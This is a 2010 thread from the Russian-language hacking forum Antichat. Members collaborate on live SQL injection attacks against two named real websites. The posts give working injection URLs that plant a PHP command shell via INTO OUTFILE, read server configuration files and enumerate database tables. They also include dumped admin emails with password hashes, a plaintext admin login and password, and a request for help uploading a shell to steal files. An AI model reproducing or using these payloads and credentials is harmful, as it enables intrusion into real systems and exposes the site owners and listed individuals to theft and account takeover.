ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.10.2010, 00:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Сообщение от 0pTik
0pTik said:
Заливаю шелл
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2®ion_id=&pais_codigo=-1+UNION+SELECT+1,%27%3C?%20system%28$_GET[cmd]%29;%20?%3E%27,3,4,5%20from%20mysql.user%20into+outfile+%271.php%27
[/COLOR][/COLOR]
-- и никак не могу найти его )) http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2®ion_id=&pais_codigo=-1+and+1=0+Union+Select+1,load_file('/var/log/apache2/error_log'),3,4,5
http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2®ion_id=&pais_codigo=-1+and+1=0+Union+Select+1,load_file('/etc/apache2/httpd.conf'),3,4,5
http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2®ion_id=&pais_codigo=-1+and+1=0+Union+Select+1,load_file('/etc/apache2/default-server.conf'),3,4,5
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
14.10.2010, 01:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
43982
Репутация:
17
|
|
Везде сказано про /srv/www/htdocs/ , пробовал подставлять не пишет (
|
|
|
|
14.10.2010, 02:07
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
hxxp://www.enzymedica.com/locator/results_list.php?zip=1' помогите расскрутить чучуть. а то не могу чето лимит =\
|
|
|
|
14.10.2010, 10:02
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от GroM88
GroM88 said:
hxxp://www.enzymedica.com/locator/results_list.php?zip=1' помогите расскрутить чучуть. а то не могу чето лимит =\
http://www.enzymedica.com/locator/results_list.php?zip=-1%27+union+select+1,version%28%29,user%28%29,datab ase%28%29,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5+--+
admins
name:emailassword
[0]:KimJackson:kimjackson@enzymedica.com:c4666c6c7871 92575aded2c73d27278a
[1]:Enzymedicarders@enzymedica.com:655ef9fec684d34335 1ee72dbeb95dd6
[2]:Kim Barton:kim@enzymedica.com:655ef9fec684d343351ee72d beb95dd6
[3]:Admin Arearder@enzymedica.com:e69dc2c09e8da6259422d987cc be95b5
[4]:cornerstone:julianna@cornerstone1.com:f326e2c3453 cf64cdb979e1c8d53293d
[5]:WebTent:support@webtent.com:e1197bbf2f07992aa7936 c49d3b41319
|
|
|
|
14.10.2010, 10:33
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
Gorev спасибо.
Тут вот другой вопрос возник
при запросе :
http://www.enzymedica.com/locator/results_list.php?zip=-1'+union+select+1,group_concat(0x3a,table_name),5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+infor mation_schema.tables+--+
Мне выдает какую то будылыгу = \
Service Temporarily Unavailable
The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.
При таком запросе:
http://www.enzymedica.com/locator/results_list.php?zip=-1'+union+select+1,table_name,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5+from+information_schema.table s+limit+0,1+--+
Странно. Мб кто нибудь знает почему не выводит названия таблиц?
|
|
|
|
14.10.2010, 10:40
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от GroM88
GroM88 said:
Gorev
спасибо.
Тут вот другой вопрос возник
при запросе :
http://www.enzymedica.com/locator/results_list.php?zip=-1'+union+select+1,group_concat(0x3a,table_name),5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+infor mation_schema.tables+--+
Мне выдает какую то будылыгу = \
Service Temporarily Unavailable
The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.
При таком запросе:
http://www.enzymedica.com/locator/results_list.php?zip=-1'+union+select+1,table_name,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5+from+information_schema.table s+limit+0,1+--+
Странно. Мб кто нибудь знает почему не выводит названия таблиц?
http://www.enzymedica.com/locator/results_list.php?zip=1%27+UNION+SELECT+1,AES_DECRY PT%28AES_ENCRYPT%28CONCAT%28%28SELECT+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1%29%29,0x71 %29,0x71%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25--%20+
|
|
|
|
14.10.2010, 10:53
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от 0pTik
0pTik said:
Везде сказано про /srv/www/htdocs/ , пробовал подставлять не пишет (
А какую инъекцию составляешь?
Вот так не работает?
http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2®ion_id=&pais_codigo=-1+and+1=0+Union+Select+1,%27%27,3,4,5+from+mysql.u ser+into+outfile+%27/srv/www/htdocs/php/newdesign/nacional/1.php%27
И шелл должен быть тут
http://www.eurotur.com.ar/php/newdesign/nacional/1.php
Если нет, то скорей всего папка недоступна на запись. Попробуй найти другую.
|
|
|
|
14.10.2010, 11:37
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
http://www.enzymedica.com/locator/results_list.php?zip=-1'+union+select+1,group_concat(0x3a,table_name),3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+i nformation_schema./*!tables*/+--+
И вообще..
Сообщение от None
union+select+1,group_concat(0x3a,table_name),5
где столбцы 3,4 потерял? =) |
|
|
|
14.10.2010, 11:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
43982
Репутация:
17
|
|
Сообщение от mr.celt
mr.celt said:
А какую инъекцию составляешь?
Вот так не работает?
http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2®ion_id=&pais_codigo=-1+and+1=0+Union+Select+1,%27%27,3,4,5+from+mysql.u ser+into+outfile+%27/srv/www/htdocs/php/newdesign/nacional/1.php%27
И шелл должен быть тут
http://www.eurotur.com.ar/php/newdesign/nacional/1.php
Если нет, то скорей всего папка недоступна на запись. Попробуй найти другую.
Да не доступна
|
|
|
|
14.10.2010, 11:52
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
Всем огромный респект за помощь со скулей)
тут другой вопрос пожоще = )
как залить шел?)
Есть полный доступ к админке)
https://enzymedica.com/admin/
login: order@enzymedica.com
pass: asdqwe123
В админке я нашол только залитие картинок = ) php не пропускает = \
очень нужно взять пару php файлов оттуда = \
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
